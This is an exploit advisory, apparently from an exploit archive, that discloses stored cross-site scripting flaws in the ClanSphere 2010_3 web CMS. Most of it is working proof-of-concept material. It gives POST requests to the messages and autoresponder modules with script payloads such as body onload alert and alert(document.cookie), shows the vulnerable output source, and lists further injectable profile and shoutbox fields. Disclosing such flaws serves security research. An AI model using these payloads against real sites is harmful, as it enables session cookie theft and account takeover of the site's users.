# exploit title: stored xss in clansphere 2010_3
# date: 22.o2.2o11
# author: lemlajt
# software : Clansphere @ sourceforge.net
# version: 2010_3
# tested on: linux
# cve : 

xss-01 PoC : 

POST http://localhost/www/cmsadmins/clansphere_2010_3/clansphere_2010_3/index.php?mod=messages&action=create

$messages_subject=<body onload=alert('yo')>

xss-02 Stored PoC:

a. post http://localhost/www/cmsadmins/clansphere_2010_3/clansphere_2010_3/index.php?mod=messages&action=autoresponder
$autoresponder_subject=">">body onload=alert(document.cookie)>

b. 'Preview'.
c. enjoy

Better: This is stored xss:

We see this message in our mailbox, and there is 
"><script>bla... in let's say: 'clear text'.

So we decide to delete this 3v1l msg from our mail's!  
--> [remove]
and this is it, stored xss is here;]

output src:
<td class="leftb">Really delete message <strong>"><body onload=alert('yo')></strong> ?</td>

btw: stored xss is also when you add "><script>tag</script> to few inputs in user profile. 
then save it, and go to edit again. and here you have another xss.

* bonus:
index.php?mod=shoutbox&action=create   ( put "><script>)

# --------
# *